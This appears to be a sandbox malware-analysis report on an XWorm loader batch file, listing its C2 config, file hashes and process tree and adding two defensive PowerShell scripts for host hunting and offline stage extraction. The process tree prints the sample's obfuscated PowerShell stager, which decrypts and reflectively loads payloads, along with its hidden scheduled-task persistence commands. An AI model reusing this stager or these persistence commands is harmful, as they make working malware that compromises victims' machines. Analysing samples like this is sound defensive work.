Analysis
max time kernel: 27s
max time network: 17s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 12/09/2024, 08:08
Static task: static1
Behavioral task: behavioral1
Sample: CosmeticLoader.bat
Resource: win10-20240404-en
General
Target: CosmeticLoader.bat
Size: 462KB
MD5: d44126df70e3dbdff887215a95e6f3ce
SHA1: 6d729305d24b9ede2bef06b7885c4348e1899287
SHA256: 5a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68
SHA512: cd63b04365d8edf905ce2cea4a3c205761d65c0feef67b8840bbc87078d8739ecf735449e8cffdcae48e5f45895f62860dff6acee1da7e8701ded067f0527daf
SSDEEP: 12288:+vhOfI50mwS2DU3R2ytr9vOH7OCGrGa4c:+vj97IAm7orkc
Malware Config
Extracted
Family: xworm
C2: 127.0.0.1:7000
C2: 80.76.49.176:7000
Install_directory: %AppData%
install_file: XClient.exe
Signatures

Detect Xworm Payload (1 IoC)
resource                                                                      yara_rule
behavioral1/memory/3928-169-0x00000200C3250000-0x00000200C3272000-memory.dmp  family_xworm

Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run Powershell and hide display window.
pid   Process
4016  powershell.exe
2688  powershell.exe
3928  powershell.exe

Executes dropped EXE (1 IoC)
pid   Process
4476  XClient.exe

Drops file in System32 directory (1 IoC)
description                   ioc                                Process
File opened for modification  C:\Windows\System32\Tasks\XClient  svchost.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
description  ioc                                                                                   Process
Key created  \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings  powershell.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
776  schtasks.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid   Process         events
4016  powershell.exe  3
2688  powershell.exe  3
3928  powershell.exe  58 (all remaining entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description              pid   Process
Token: SeDebugPrivilege  4016  powershell.exe
Token: SeDebugPrivilege  2688  powershell.exe
followed, for pid 2688 powershell.exe, by the 21-token sequence below three times over (the third pass ends at Token: 35, where the 64-entry list stops):
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory (62 IoCs)
source pid / Process   target pid  procid_target  events
5012 cmd.exe           3684        75             2
5012 cmd.exe           4016        76             2
4016 powershell.exe    2688        77             2
4016 powershell.exe    520         80             2
520 WScript.exe        3516        81             2
3516 cmd.exe           4212        83             2
3516 cmd.exe           3928        84             2
3928 powershell.exe    776         85             2
1068 svchost.exe       4476        87             2
3928 powershell.exe    one write each into 44 already-running processes, target pid (procid_target): 3112 (54), 2556 (45), 2356 (66), 1960 (37), 384 (15), 1760 (35), 2544 (44), 1556 (29), 1752 (34), 1352 (26), 1548 (39), 2720 (50), 748 (10), 2912 (53), 1728 (33), 1328 (25), 2700 (49), 1320 (24), 1512 (28), 1116 (21), 916 (13), 1896 (36), 1060 (19), 2680 (48), 2876 (52), 704 (16), 4820 (61), 876 (12), 1068 (20), 2636 (46), 4596 (63), 1048 (18), 1240 (23), 1628 (31), 1680 (32), 1212 (22), 816 (11), 1404 (27), 1600 (30), 4948 (64), 2188 (40), 2372 (41), 596 (17), 2748 (51)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
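Persistence in this run is two scheduled tasks. schtasks.exe (PID 776) creates "XClient" with /sc minute /mo 1 and /RL HIGHEST so that %AppData%\XClient.exe is relaunched every minute, and PowerShell (PID 2688) registers "$phantom-RuntimeBroker_startup_323_str" with an at-logon trigger, -Hidden and -RunLevel Highest to run the dropped $phantom-startup_str_323.vbs. The Schedule service (svchost.exe PID 1068) writes the task definition to C:\Windows\System32\Tasks\XClient and is the parent of XClient.exe (PID 4476), which is why the "Drops file in System32 directory" and "Executes dropped EXE" hits sit under a svchost.exe rather than under the loader. The hunt below is an added example and not part of the tria.ge report: it copies the task names, dropped paths and C2 host:port from this page, but the user-writable directory list, the repetition-interval threshold and the two-hit scoring rule are assumptions.

```powershell
<#
  Host hunt for the persistence and C2 artefacts recorded in this report.
  Added example; not code from tria.ge or from the sample. Indicator values
  come from the report, thresholds and directory list are assumptions.
  Needs the ScheduledTasks and NetTCPIP modules (Windows 8 / Server 2012+);
  run elevated so every task and C:\Windows\System32\Tasks are readable.
#>
[CmdletBinding()]
param()

# Indicators taken from the report.
$KnownTaskNames = @('XClient', '$phantom-RuntimeBroker_startup_323_str')
$KnownDrops     = @(
    (Join-Path $env:APPDATA 'XClient.exe'),
    (Join-Path $env:APPDATA '$phantom-startup_str_323.vbs'),
    (Join-Path $env:APPDATA '$phantom-startup_str_323.bat'),
    'C:\Windows\System32\Tasks\XClient'          # task XML written by the Schedule service
)
$C2Address = '80.76.49.176'   # the 127.0.0.1:7000 entry is loopback and cannot be reached remotely
$C2Port    = 7000

# Assumption: task actions launched from these user-writable roots deserve a look.
$SuspiciousRoots = @(@($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, "$env:SystemDrive\Users\Public") |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() })

function Test-SuspiciousTask {
    # Returns the list of reasons a task looks like the two observed here (empty list = nothing notable).
    param($Task)
    $reasons = @()
    foreach ($a in @($Task.Actions | Where-Object { $_ })) {
        $exe    = [Environment]::ExpandEnvironmentVariables([string]$a.Execute).Trim('"').ToLowerInvariant()
        $argStr = [Environment]::ExpandEnvironmentVariables([string]$a.Arguments).ToLowerInvariant()
        foreach ($root in $SuspiciousRoots) {
            if ($exe.StartsWith($root) -or $argStr.Contains($root)) { $reasons += "action under $root"; break }
        }
        # WScript.exe running a .vbs from the profile is the second task's shape.
        if ($exe -match '(wscript|cscript|powershell|cmd)\.exe$' -and $argStr -match '\.(vbs|bat|ps1|js)\b') {
            $reasons += 'script-host action'
        }
    }
    if ("$($Task.Principal.RunLevel)" -eq 'Highest') { $reasons += 'RunLevel Highest' }
    if ($Task.Settings.Hidden)                      { $reasons += 'Hidden' }
    foreach ($t in @($Task.Triggers | Where-Object { $_ })) {
        if ($t.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger') { $reasons += 'logon trigger' }
        # schtasks /sc minute /mo 1 shows up as a repetition interval of PT1M; anything up to 5 min is flagged (assumption).
        if ("$($t.Repetition.Interval)" -match '^PT([1-5])M$') { $reasons += "repeats every $($Matches[1]) min" }
    }
    if ($KnownTaskNames -contains $Task.TaskName) { $reasons += 'known task name' }
    return $reasons
}

# 1. Scheduled tasks
Get-ScheduledTask | ForEach-Object {
    $why = @(Test-SuspiciousTask $_)
    # Assumption: a single hit is common on clean hosts; two or more, or a known name, goes to triage.
    if (($why.Count -ge 2) -or ($why -contains 'known task name')) {
        [pscustomobject]@{ Check = 'Task'; Item = "$($_.TaskPath)$($_.TaskName)"; Detail = ($why -join '; ') }
    }
}

# 2. Dropped files and the on-disk task definition
foreach ($p in $KnownDrops) {
    if (Test-Path -LiteralPath $p) {
        $h = (Get-FileHash -Algorithm SHA256 -LiteralPath $p -ErrorAction SilentlyContinue).Hash
        [pscustomobject]@{ Check = 'File'; Item = $p; Detail = "present, SHA256=$h" }
    }
}

# 3. Live sockets to the XWorm C2 (both config entries use port 7000)
Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $_.RemoteAddress -eq $C2Address -or ($_.RemotePort -eq $C2Port -and $_.State -eq 'Established') } |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{ Check = 'Net'; Item = "$($_.RemoteAddress):$($_.RemotePort)"; Detail = "pid $($_.OwningProcess) $($proc.ProcessName)" }
    }
```

The script emits objects rather than text, so its output can be piped to Format-Table, Export-Csv or a remoting session over a fleet. Because the task name check is exact, renamed variants rely on the structural signals (action in %AppData%, Hidden, RunLevel Highest, one-minute repetition or logon trigger); on a host where software legitimately installs per-user update tasks, raise the hit threshold rather than removing a signal.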
Processes
(one line per process, indented by parent; signature hits are listed under the process that triggered them)

PID 748   c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
PID 816   C:\Windows\system32\svchost.exe -k DcomLaunch
PID 876   c:\windows\system32\svchost.exe -k rpcss
PID 916   c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
PID 384   c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
PID 704   c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
PID 596   c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
PID 1048  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
PID 1060  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
PID 1068  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
          - Drops file in System32 directory
          - Suspicious use of WriteProcessMemory
    PID 4476  C:\Users\Admin\AppData\Roaming\XClient.exe
              - Executes dropped EXE
PID 1116  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
PID 1212  c:\windows\system32\svchost.exe -k localservice -s nsi
PID 1240  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
PID 1320  c:\windows\system32\svchost.exe -k localservice -s EventSystem
PID 1328  c:\windows\system32\svchost.exe -k netsvcs -s Themes
PID 1352  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
PID 1404  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
PID 1512  c:\windows\system32\svchost.exe -k netsvcs -s SENS
PID 1556  c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
PID 1600  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
PID 1628  c:\windows\system32\svchost.exe -k networkservice -s Dnscache
PID 1680  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
PID 1728  c:\windows\system32\svchost.exe -k localservice -s netprofm
PID 1752  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
PID 1760  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
PID 1896  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
PID 1960  c:\windows\system32\svchost.exe -k appmodel -s StateRepository
PID 1548  c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
PID 2188  c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
PID 2372  c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
PID 2544  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
PID 2556  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
PID 2636  c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
PID 2680  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
PID 2700  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
PID 2720  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
PID 2748  c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
PID 2876  c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
PID 2912  c:\windows\system32\svchost.exe -k netsvcs -s Browser
PID 3112  C:\Windows\Explorer.EXE
          - Suspicious behavior: GetForegroundWindowSpam
    PID 5012  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CosmeticLoader.bat"
              - Suspicious use of WriteProcessMemory
        PID 3684  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iv04Ns0kPKLIVTUZA6Q2SQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Zxwkp=New-Object System.IO.MemoryStream(,$param_var); $JOKcw=New-Object System.IO.MemoryStream; $vznpW=New-Object System.IO.Compression.GZipStream($Zxwkp, [IO.Compression.CompressionMode]::Decompress); $vznpW.CopyTo($JOKcw); $vznpW.Dispose(); $Zxwkp.Dispose(); $JOKcw.Dispose(); $JOKcw.ToArray();}function execute_function($param_var,$param2_var){ $Ekltt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uOQTi=$Ekltt.EntryPoint; $uOQTi.Invoke($null, $param2_var);}$oFsgC = 'C:\Users\Admin\AppData\Local\Temp\CosmeticLoader.bat';$host.UI.RawUI.WindowTitle = $oFsgC;$emRHs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oFsgC).Split([Environment]::NewLine);foreach ($hVxGX in $emRHs) { if ($hVxGX.StartsWith('apqHOrrBYoUaaAYCNYVK')) { $TkgLL=$hVxGX.Substring(20); break; }}$payloads_var=[string[]]$TkgLL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        PID 4016  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  - Command and Scripting Interpreter: PowerShell
                  - Modifies registry class
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory
            PID 2688  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_323_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                      - Command and Scripting Interpreter: PowerShell
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
            PID 520   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs"
                      - Suspicious use of WriteProcessMemory
                PID 3516  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat" "
                          - Suspicious use of WriteProcessMemory
                    PID 4212  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iv04Ns0kPKLIVTUZA6Q2SQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Zxwkp=New-Object System.IO.MemoryStream(,$param_var); $JOKcw=New-Object System.IO.MemoryStream; $vznpW=New-Object System.IO.Compression.GZipStream($Zxwkp, [IO.Compression.CompressionMode]::Decompress); $vznpW.CopyTo($JOKcw); $vznpW.Dispose(); $Zxwkp.Dispose(); $JOKcw.Dispose(); $JOKcw.ToArray();}function execute_function($param_var,$param2_var){ $Ekltt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uOQTi=$Ekltt.EntryPoint; $uOQTi.Invoke($null, $param2_var);}$oFsgC = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat';$host.UI.RawUI.WindowTitle = $oFsgC;$emRHs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oFsgC).Split([Environment]::NewLine);foreach ($hVxGX in $emRHs) { if ($hVxGX.StartsWith('apqHOrrBYoUaaAYCNYVK')) { $TkgLL=$hVxGX.Substring(20); break; }}$payloads_var=[string[]]$TkgLL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                    PID 3928  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                              - Command and Scripting Interpreter: PowerShell
                              - Suspicious behavior: EnumeratesProcesses
                              - Suspicious use of WriteProcessMemory
                        PID 776   "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
                                  - Scheduled Task/Job: Scheduled Task
PID 4820  c:\windows\system32\svchost.exe -k localservice -s CDPSvc
PID 4596  c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
PID 4948  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
PID 2356  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
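The two cmd.exe echo lines (PIDs 3684 and 4212) carry the same PowerShell stager; each sits beside a powershell.exe -w hidden under the same parent cmd.exe, the process shape cmd produces for echo ... | powershell -w hidden, and the only difference between them is $oFsgC, the path of the .bat the stager reads back (first CosmeticLoader.bat in %Temp%, then the dropped $phantom-startup_str_323.bat in %AppData%). Method names are hidden as reversed strings: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'txeTllAdaeR' is ReadAllText and 'daoL' is Load. The stager reads its own .bat, takes the first line that begins with the 20-character marker apqHOrrBYoUaaAYCNYVK, drops the marker, splits the remainder on '\', and for each piece undoes a two-character substitution ('#' stands for '/', '@' for 'A'), base64-decodes, AES-CBC/PKCS7-decrypts with the hard-coded 32-byte key and 16-byte IV, gunzips, and hands the bytes to Assembly.Load(), invoking the entry point (first stage with no arguments, second with an empty string[]). Key, IV and marker are identical in both command lines. The script below is an added example, not code from the sample or from tria.ge: it reproduces that decode chain but writes each stage to disk and hashes it instead of loading it. Key, IV, marker and the substitutions are copied from the captured command line; the parameter names, output file naming and the MZ check are assumptions.

```powershell
<#
  Static stage extractor for the stager captured in this report.
  Added example; not the sample's code and not tria.ge tooling.
  Re-implements the loader's decode chain (mangled base64 -> AES-CBC -> GZip)
  and writes the stages out instead of calling Assembly.Load().
  Usage (assumed file name):  .\Extract-Stages.ps1 -BatPath .\CosmeticLoader.bat
  Works unchanged on the dropped $phantom-startup_str_323.bat, which uses the same key, IV and marker.
#>
param(
    [Parameter(Mandatory)][string]$BatPath,
    [string]$OutDir = (Join-Path (Split-Path -Parent (Resolve-Path -LiteralPath $BatPath)) 'extracted')
)

# Constants copied from the captured command line.
$Marker = 'apqHOrrBYoUaaAYCNYVK'                                                      # 20-char prefix of the payload line
$Key    = [Convert]::FromBase64String('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw=')  # 32 bytes -> AES-256
$IV     = [Convert]::FromBase64String('iv04Ns0kPKLIVTUZA6Q2SQ==')                      # 16 bytes

function ConvertFrom-StagerBase64 {
    # The loader stores base64 with '/' replaced by '#' and 'A' replaced by '@'; undo that, then decode.
    param([string]$Text)
    ,[Convert]::FromBase64String($Text.Replace('#', '/').Replace('@', 'A'))
}

function Unprotect-StagerBlob {
    # AES-CBC with PKCS7 padding and the fixed key/IV, as decrypt_function does.
    param([byte[]]$Cipher)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec = $aes.CreateDecryptor()
        try { $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) } finally { $dec.Dispose() }
        ,$plain
    } finally { $aes.Dispose() }
}

function Expand-StagerBlob {
    # GZip inflate, as decompress_function does.
    param([byte[]]$Compressed)
    $in  = New-Object System.IO.MemoryStream(,$Compressed)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    ,$bytes
}

# Find the payload line the way the loader does: first line that starts with the marker.
$payloadLine = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $payloadLine) { throw "Marker '$Marker' not found in $BatPath; not this loader variant." }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$chunks = $payloadLine.Substring($Marker.Length).Split('\')   # the loader runs stage [0] with no args, stage [1] with an empty string[]
$i = 0
foreach ($chunk in $chunks) {
    $i++
    $stage = Expand-StagerBlob (Unprotect-StagerBlob (ConvertFrom-StagerBase64 $chunk))
    # Assembly.Load() expects a managed PE, so a correctly decoded stage should start with 'MZ'.
    $isPe    = ($stage.Length -ge 2 -and $stage[0] -eq 0x4D -and $stage[1] -eq 0x5A)
    $outFile = Join-Path $OutDir ('stage{0}.bin' -f $i)
    [IO.File]::WriteAllBytes($outFile, $stage)
    $sha = (Get-FileHash -Algorithm SHA256 -LiteralPath $outFile).Hash
    '{0}: {1} bytes, MZ={2}, SHA256={3}' -f $outFile, $stage.Length, $isPe, $sha
}
```

Run it on an isolated analysis VM; it never loads or invokes the decoded assemblies, and a stage that fails the MZ check (or throws a padding error in TransformFinalBlock) means the key, IV or substitution table differs from this variant and should be re-read from that sample's own command line. The resulting stage files are what the "Detect Xworm Payload" YARA hit saw in PID 3928's memory, now available for static analysis and for feeding the XWorm config extractor offline.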
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
MD5: ad5cd538ca58cb28ede39c108acb5785
SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Filesize: 50KB
MD5: 2143b379fed61ab5450bab1a751798ce
SHA1: 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256: a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512: 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Filesize: 2KB
MD5: aeb24b5729d62e81a27174f46d431126
SHA1: baa02ac3f99822d1915bac666450dc20727494bb
SHA256: d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471
SHA512: e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Filesize: 1B (these are the hashes of the single ASCII character "1")
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 462KB (same hashes as the submitted CosmeticLoader.bat)
MD5: d44126df70e3dbdff887215a95e6f3ce
SHA1: 6d729305d24b9ede2bef06b7885c4348e1899287
SHA256: 5a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68
SHA512: cd63b04365d8edf905ce2cea4a3c205761d65c0feef67b8840bbc87078d8739ecf735449e8cffdcae48e5f45895f62860dff6acee1da7e8701ded067f0527daf

Filesize: 124B
MD5: f7de4b9f14c10d5abaa492c2c3df7232
SHA1: b4ecb2a31cfda13694563e47afdbd0352f01d51c
SHA256: b019b61f2bd0c425e83c1431e670e1cef0c87a703fdcd04f1a6eea9378f9c8cb
SHA512: 1bbdc6505ae290437de19afc063dbbb45e85a99ecefae1f3d702e94c7ff4da67d3d4a5cb3b2910228b465bf0eca90a33f212c0ba88b8893b4a1b2a71b913027c

Filesize: 435KB
MD5: f7722b62b4014e0c50adfa9d60cafa1c
SHA1: f31c17e0453f27be85730e316840f11522ddec3e
SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4